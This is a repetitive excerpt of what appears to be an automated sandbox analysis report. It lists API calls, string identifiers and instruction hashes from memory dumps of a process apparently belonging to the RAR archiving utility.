                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D64000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D6E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D76000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422425142.00007FF695D78000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422459095.00007FF695D7E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_103_2_7ff695cd0000_rar.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                                    • String ID: e+000$gfff
                                                                                                                                                                                                                                                                    • API String ID: 3215553584-3030954782
                                                                                                                                                                                                                                                                    • Opcode ID: a7106781bdf1546bde54527bf858c9e03adeffff05cd77f62067aea497a9d42c
                                                                                                                                                                                                                                                                    • Instruction ID: 389b1ca0515f5bcd5e056616024abf03a248af2fca052a703f0601e1b94e2751
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a7106781bdf1546bde54527bf858c9e03adeffff05cd77f62067aea497a9d42c
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1751F562B187C246E7358B35A9413697BD1EB41F94F08A3B1C698CBBD5CE3CD848C704
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • GetCurrentDirectoryW.KERNEL32(?,?,?,00000800,?,?,00000000,00007FF695CF475B,?,00000000,?,?,00007FF695CF4620,?,00000000,?), ref: 00007FF695D04633
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000067.00000002.2422125034.00007FF695CD1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF695CD0000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422092068.00007FF695CD0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422182749.00007FF695D40000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422226086.00007FF695D58000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422259960.00007FF695D59000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D5A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D64000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D6E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D76000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422425142.00007FF695D78000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422459095.00007FF695D7E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_103_2_7ff695cd0000_rar.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: CurrentDirectory
                                                                                                                                                                                                                                                                    • String ID: UNC$\\?\
                                                                                                                                                                                                                                                                    • API String ID: 1611563598-253988292
                                                                                                                                                                                                                                                                    • Opcode ID: da028c110e4e0ee969c3eaba738cc076e51dd9ec006f0672d54c2a85376dd233
                                                                                                                                                                                                                                                                    • Instruction ID: 377ff047bd230e9e592eab6c602f5d3bc3254e91128c5e91eee19ff541c3eb77
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: da028c110e4e0ee969c3eaba738cc076e51dd9ec006f0672d54c2a85376dd233
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F741A001A0868280E934AB21E5015F922D1EF45FD4FC1A3B2DD5EC76D6EE6CEE8DC208
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000067.00000002.2422125034.00007FF695CD1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF695CD0000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422092068.00007FF695CD0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422182749.00007FF695D40000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422226086.00007FF695D58000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422259960.00007FF695D59000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D5A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D64000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D6E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D76000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422425142.00007FF695D78000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422459095.00007FF695D7E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_103_2_7ff695cd0000_rar.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: AttributesFilewcsstr
                                                                                                                                                                                                                                                                    • String ID: System Volume Information\
                                                                                                                                                                                                                                                                    • API String ID: 1592324571-4227249723
                                                                                                                                                                                                                                                                    • Opcode ID: 4db18abc006475e63bde04fe0f8edb9794334f288998beee5a1eb1867efadb0f
                                                                                                                                                                                                                                                                    • Instruction ID: 87976ce91537a6b06ae008904cacf3402383abc5d812aced837017e2a82f69f7
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4db18abc006475e63bde04fe0f8edb9794334f288998beee5a1eb1867efadb0f
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4D31F622A1D68185FB75DB21A1516BE27E1EF45FC0F0462B0DE8D977A6CE3CEC4A8704
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000067.00000002.2422125034.00007FF695CD1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF695CD0000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422092068.00007FF695CD0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422182749.00007FF695D40000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422226086.00007FF695D58000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422259960.00007FF695D59000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D5A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D64000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D6E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D76000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422425142.00007FF695D78000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422459095.00007FF695D7E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_103_2_7ff695cd0000_rar.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: LoadString$fflushswprintf
                                                                                                                                                                                                                                                                    • String ID: %d.%02d$[
                                                                                                                                                                                                                                                                    • API String ID: 1946543793-195111373
                                                                                                                                                                                                                                                                    • Opcode ID: f04d483f56175c8b40415d20487cbec804232b663c65daca34dce35784760712
                                                                                                                                                                                                                                                                    • Instruction ID: a3aae3af4b155f5821c235e0044df1694b5690cc4c625dc4facd60fdbabaee8d
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f04d483f56175c8b40415d20487cbec804232b663c65daca34dce35784760712
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8531AE22A195C291FA74EB10E0523B967E0EF85F84F4021B9D64E9B6C6DF3CED48C748
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000067.00000002.2422125034.00007FF695CD1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF695CD0000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422092068.00007FF695CD0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422182749.00007FF695D40000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422226086.00007FF695D58000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422259960.00007FF695D59000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D5A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D64000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D6E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D76000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422425142.00007FF695D78000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422459095.00007FF695D7E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_103_2_7ff695cd0000_rar.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: swprintf
                                                                                                                                                                                                                                                                    • String ID: fixed%u.$fixed.
                                                                                                                                                                                                                                                                    • API String ID: 233258989-2525383582
                                                                                                                                                                                                                                                                    • Opcode ID: fddd7528cb08c65f409e766db47ba8cea55e1086a780a4f54c28e47408ad2848
                                                                                                                                                                                                                                                                    • Instruction ID: d2bd5dd947333741e1aa55be30f18e32ed628b4caadafd3d996f6a7b369fb398
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: fddd7528cb08c65f409e766db47ba8cea55e1086a780a4f54c28e47408ad2848
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4131A822A0868291F7309B25E4017E963E0EB84B90F901272EE8D976DADF3CD94AC744
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000067.00000002.2422125034.00007FF695CD1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF695CD0000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422092068.00007FF695CD0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422182749.00007FF695D40000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422226086.00007FF695D58000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422259960.00007FF695D59000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D5A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D64000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D6E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D76000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422425142.00007FF695D78000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422459095.00007FF695D7E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_103_2_7ff695cd0000_rar.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: snprintf
                                                                                                                                                                                                                                                                    • String ID: $%s$@%s
                                                                                                                                                                                                                                                                    • API String ID: 4288800496-834177443
                                                                                                                                                                                                                                                                    • Opcode ID: 7a7053d11aa3be1251aeb62ffc93e7b2ac424df20b613d8193438d5ab2157725
                                                                                                                                                                                                                                                                    • Instruction ID: 69276e544058adc13a159c7ae155a1bff360f2672d6e5058cb9eeb57c755f2b5
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7a7053d11aa3be1251aeb62ffc93e7b2ac424df20b613d8193438d5ab2157725
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 46319162B08A8295EA249F55E4407A923E1FF45F88F502272EE0D97B99DF3CE90DC744
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000067.00000002.2422125034.00007FF695CD1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF695CD0000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422092068.00007FF695CD0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422182749.00007FF695D40000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422226086.00007FF695D58000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422259960.00007FF695D59000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D5A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D64000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D6E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D76000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422425142.00007FF695D78000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422459095.00007FF695D7E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_103_2_7ff695cd0000_rar.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: LoadString
                                                                                                                                                                                                                                                                    • String ID: Adding %-58s
                                                                                                                                                                                                                                                                    • API String ID: 2948472770-2059140559
                                                                                                                                                                                                                                                                    • Opcode ID: 029dc5b3afc22f1748ed18b4bb1637acba6cd1f0e3e62fcee6acc39158075de8
                                                                                                                                                                                                                                                                    • Instruction ID: 342d6166d40948fa65286a62388c0e71b0b33fee394eb18a76babefd48c39e2d
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 029dc5b3afc22f1748ed18b4bb1637acba6cd1f0e3e62fcee6acc39158075de8
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B3116D61B19B81C5EA248F16E940069B7E1FF94FC4F54A676CE4CD3324EE3CE90A8348
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000067.00000002.2422125034.00007FF695CD1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF695CD0000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422092068.00007FF695CD0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422182749.00007FF695D40000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422226086.00007FF695D58000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422259960.00007FF695D59000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D5A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D64000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D6E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D76000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422425142.00007FF695D78000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422459095.00007FF695D7E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_103_2_7ff695cd0000_rar.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: swprintf
                                                                                                                                                                                                                                                                    • String ID: ;%%0%du
                                                                                                                                                                                                                                                                    • API String ID: 233258989-2249936285
                                                                                                                                                                                                                                                                    • Opcode ID: 5630f68361fdad429f81d227d618e3426730f2a1c59dfa690c7e09baebf2de4d
                                                                                                                                                                                                                                                                    • Instruction ID: 2c271cb3f98519f8ae0ac373d07c2b4dfaf6486983cb0e313f47e0dff1e988c3
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5630f68361fdad429f81d227d618e3426730f2a1c59dfa690c7e09baebf2de4d
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F5116323A0868096E6309B24E5103E977E0FB88B44F495175EB4D87799DE7CE949CB44
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                      • Part of subcall function 00007FF695D042CC: swprintf.LEGACY_STDIO_DEFINITIONS ref: 00007FF695D0430F
                                                                                                                                                                                                                                                                    • GetVolumeInformationW.KERNEL32(?,00007FF695CF0BED,?,?,00000000,?,?,00007FF695CEF30F,00000000,00007FF695CD6380,?,00007FF695CD2EC8), ref: 00007FF695CF337E
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000067.00000002.2422125034.00007FF695CD1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF695CD0000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422092068.00007FF695CD0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422182749.00007FF695D40000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422226086.00007FF695D58000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422259960.00007FF695D59000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D5A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D64000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D6E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D76000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422425142.00007FF695D78000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422459095.00007FF695D7E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_103_2_7ff695cd0000_rar.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: InformationVolumeswprintf
                                                                                                                                                                                                                                                                    • String ID: FAT$FAT32
                                                                                                                                                                                                                                                                    • API String ID: 989755765-1174603449
                                                                                                                                                                                                                                                                    • Opcode ID: b1ebeb30fd722dd76b352bce1e824f537b2a19fc82dbcf7dfb484d1401dd98df
                                                                                                                                                                                                                                                                    • Instruction ID: fec6eb2aa3e59e1d58b070ae7001fecc365ca0eb9f8fd587f01d415f8badfdf8
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b1ebeb30fd722dd76b352bce1e824f537b2a19fc82dbcf7dfb484d1401dd98df
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F7118232618A4291F7709B50E8812AA63E0FF85B44F807175E94DC3A99DF3CE90D8B08
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000067.00000002.2422125034.00007FF695CD1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF695CD0000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422092068.00007FF695CD0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422182749.00007FF695D40000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422226086.00007FF695D58000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422259960.00007FF695D59000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D5A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D64000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D6E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D76000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422425142.00007FF695D78000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422459095.00007FF695D7E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_103_2_7ff695cd0000_rar.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: ErrorExceptionLastObjectSingleThrowWait
                                                                                                                                                                                                                                                                    • String ID: WaitForMultipleObjects error %d, GetLastError %d
                                                                                                                                                                                                                                                                    • API String ID: 564652978-2248577382
                                                                                                                                                                                                                                                                    • Opcode ID: 46226563a9827009269dbdda457766bca55c7f33c1314a041e0b52dd23cb2e00
                                                                                                                                                                                                                                                                    • Instruction ID: a0d8f05f9ca8562bf5f0f4aa9a531f52a1f027209ac462f34013c676e869ba28
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 46226563a9827009269dbdda457766bca55c7f33c1314a041e0b52dd23cb2e00
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: DEE01A22E0980282F624AB24AC8207433E0EF51F74F9023B0D43EC61E19F2CAD4FC309